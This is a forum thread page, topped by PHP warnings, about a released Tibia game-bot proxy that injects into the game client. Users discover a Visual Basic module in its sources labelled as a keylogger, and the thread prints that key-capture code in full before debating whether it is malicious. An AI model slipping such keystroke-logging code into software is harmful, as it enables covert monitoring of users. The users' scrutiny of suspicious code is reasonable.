Deprecated: The behavior of unparenthesized expressions containing both '.' and '+'/'-' will change in PHP 8: '+'/'-' will take a higher precedence in /home/iano/public_html/tpforums-vb5/forum/includes/class_core.php on line 5842

PHP Warning: Use of undefined constant MYSQL_NUM - assumed 'MYSQL_NUM' (this will throw an Error in a future version of PHP) in ..../includes/init.php on line 165

PHP Warning: Use of undefined constant MYSQL_ASSOC - assumed 'MYSQL_ASSOC' (this will throw an Error in a future version of PHP) in ..../includes/init.php on line 165

PHP Warning: Use of undefined constant MYSQL_BOTH - assumed 'MYSQL_BOTH' (this will throw an Error in a future version of PHP) in ..../includes/init.php on line 165

PHP Warning: "continue" targeting switch is equivalent to "break". Did you mean to use "continue 2"? in ..../includes/functions_navigation.php on line 588

PHP Warning: "continue" targeting switch is equivalent to "break". Did you mean to use "continue 2"? in ..../includes/functions_navigation.php on line 612

PHP Warning: Use of undefined constant misc - assumed 'misc' (this will throw an Error in a future version of PHP) in ..../global.php(29) : eval()'d code(6) : eval()'d code on line 1

PHP Warning: Use of undefined constant index - assumed 'index' (this will throw an Error in a future version of PHP) in ..../global.php(29) : eval()'d code(6) : eval()'d code on line 1

PHP Warning: Use of undefined constant misc - assumed 'misc' (this will throw an Error in a future version of PHP) in ..../includes/class_bootstrap.php(1422) : eval()'d code(4) : eval()'d code on line 1

PHP Warning: Use of undefined constant index - assumed 'index' (this will throw an Error in a future version of PHP) in ..../includes/class_bootstrap.php(1422) : eval()'d code(4) : eval()'d code on line 1

PHP Warning: Use of undefined constant onlinestatusphrase - assumed 'onlinestatusphrase' (this will throw an Error in a future version of PHP) in ..../includes/class_core.php(4684) : eval()'d code on line 6

PHP Warning: Use of undefined constant onlinestatusphrase - assumed 'onlinestatusphrase' (this will throw an Error in a future version of PHP) in ..../includes/class_core.php(4684) : eval()'d code on line 6

TPR - Tibia Proxy Runemaker - Full sources and binaries - Page 2
Page 2 of 2 FirstFirst 12

Thread: TPR - Tibia Proxy Runemaker - Full sources and binaries

RE: TPR - Tibia Proxy Runemaker - Full sources and binaries

Quote Originally Posted by Dark Fire
    None of the TPR programs in this package works for me on 32x Win7. The programs inject, apparently properly, to my Tibia client. I can for example change the Tibia client name, and I also get a static client ID (doesn't change if I close TPR and start a new one), however it just says "Logged out" and it doesn't send anything. I tried to put TPR in a new folder without any other files (packet.dll) and I didn't get an error or anything, it behaved just like with the packet.dll in a new folder. So might it be that it doesn't inject/use packet.dll properly or at all? I tried copying packet.dll to %windows% and to %system32%, that didn't help. I've also tried running TPR under Admin, under XP compatibility, client under Admin and TPR not, TPR under admin and client not, and both under admin (also neither under admin). Suggestions? And 3.2, 3.1 etc - I have used those before (I recognize the layout of the program) - those used to always work, but in this package I get an error 13 type mismatch. Some guy replied in the other TPR thread that one are to compile packet.dll and get a .def file from it? Ok? I thought packet.dll was already compiled, and what can I use the def file for...
    Did you extract the Winrar archive?

Quote Originally Posted by Robbisen
    Quote Originally Posted by Dark Fire
    None of the TPR programs in this package works for me on 32x Win7. The programs inject, apparently properly, to my Tibia client. I can for example change the Tibia client name, and I also get a static client ID (doesn't change if I close TPR and start a new one), however it just says "Logged out" and it doesn't send anything. I tried to put TPR in a new folder without any other files (packet.dll) and I didn't get an error or anything, it behaved just like with the packet.dll in a new folder. So might it be that it doesn't inject/use packet.dll properly or at all? I tried copying packet.dll to %windows% and to %system32%, that didn't help. I've also tried running TPR under Admin, under XP compatibility, client under Admin and TPR not, TPR under admin and client not, and both under admin (also neither under admin). Suggestions? And 3.2, 3.1 etc - I have used those before (I recognize the layout of the program) - those used to always work, but in this package I get an error 13 type mismatch. Some guy replied in the other TPR thread that one are to compile packet.dll and get a .def file from it? Ok? I thought packet.dll was already compiled, and what can I use the def file for...
    Did you extract the Winrar archive?
    That question is unspecific. Assuming that you're referring to the individual winrar-archives inside the one winrar-archive itself -- yes. They are only duplicates as far as I can remember.

"Attribute VB_Name = "Main"
    'Module for the keylogger, Copyright© 2000, Konstantin Tretyakov
    'If you use this in your program, don't forget about me (in some greetingz section, or kinda)
    'Thanx, have fun
    'Konstantin Tretyakov (kt_ee@hotmail.com)"

wtf is this shit...

Well , what the fuck? This can indeed be found in the main.bas file inside the 'modules' folder. Thought the head admin of TProgramming was someone you could trust.

Code:
    Attribute VB_Name = "Main"
    'Module for the keylogger, Copyright© 2000, Konstantin Tretyakov
    'If you use this in your program, don't forget about me (in some greetingz section, or kinda)
    'Thanx, have fun
    'Konstantin Tretyakov (kt_ee@hotmail.com)

Option Explicit
    Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
    Private Declare Function DefWindowProc Lib "user32" Alias "DefWindowProcA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
    Public Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Public Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long) As Long
    Public PrevFuncPointer As Long

'This is the message that will be fired to the specified window
    'when a key is pressed
    Public Const MyOwnMessage = &H102 'Too large numbers don't work (WHY???)

'Functions for recognising the pressed key's name
    Private Declare Function ToAscii Lib "user32" (ByVal uVirtKey As Long, ByVal uScanCode As Long, lpbKeyState As Byte, lpwTransKey As Long, ByVal fuState As Long) As Long
    Private Declare Function GetKeyboardState Lib "user32" (pbKeyState As Byte) As Long
    Private Declare Function GetKeyNameText Lib "user32" Alias "GetKeyNameTextA" (ByVal lParam As Long, ByVal lpBuffer As String, ByVal nSize As Long) As Long

Public KeyboardState(0 To 255) As Byte 'Needed for the ToAscii function

Public Function Window_OnMessage(ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
        'Here wParam - Virtual KeyCode, lParam - Keyboard ScanCode
        Dim TempRes As Long, KeyAscii As Long, KeyName As String

'Is this the required message?
        If Msg = MyOwnMessage Then
        'Now record the key pressed
            If (lParam And &H80000000) = 0 Then 'If true, then there was a KeyDown event, else - KeyUp
                If GetKeyboardState(KeyboardState(0)) = 0 Then GoTo ByeBye  'Needed for the ToAscii
                TempRes = ToAscii(wParam, lParam, KeyboardState(0), KeyAscii, 0)
                If (TempRes = 1) And ((KeyAscii > 31) Or (KeyAscii = 13)) Then
                'Key my be just added to the log
                    If KeyAscii <> 13 Then
                        frmMain.txtLog = frmMain.txtLog & Chr(KeyAscii)
                    Else
                        frmMain.txtLog = frmMain.txtLog & vbCrLf
                    End If
                Else
                'That is some control key, get its name
                    KeyName = String(20, " ")
                    TempRes = GetKeyNameText(lParam, KeyName, 20)
                    If TempRes <> 0 Then
                        KeyName = Left(KeyName, TempRes)
                        frmMain.txtLog = frmMain.txtLog & "{" & KeyName & "}"
                    End If
                End If
    ByeBye:
            Else
                'You may also process the KeyUp events also,
                'but if you log them together with KeyDown events,
                'the log will be a bit unreadable
            End If
        End If
        'Pass the procedure to the default handler

Window_OnMessage = CallWindowProc(PrevFuncPointer, hwnd, Msg, wParam, lParam)
    End Function

I guess it's for the hotkeys, but I may be wrong. I never used it.

Could someone confirm that this is safe and why he has a keylogger module in his sources? My virusprogram alerts for malware32gen, rootkit and lots of stuff, a reply from Ian on this would be nice.

Super Moderator

Quote Originally Posted by Blahhh
    Could someone confirm that this is safe and why he has a keylogger module in his sources? My virusprogram alerts for malware32gen, rootkit and lots of stuff, a reply from Ian on this would be nice.
    I haven't read the entire source code, but I'm guessing it's for hotkeys, not actually logging keystrokes.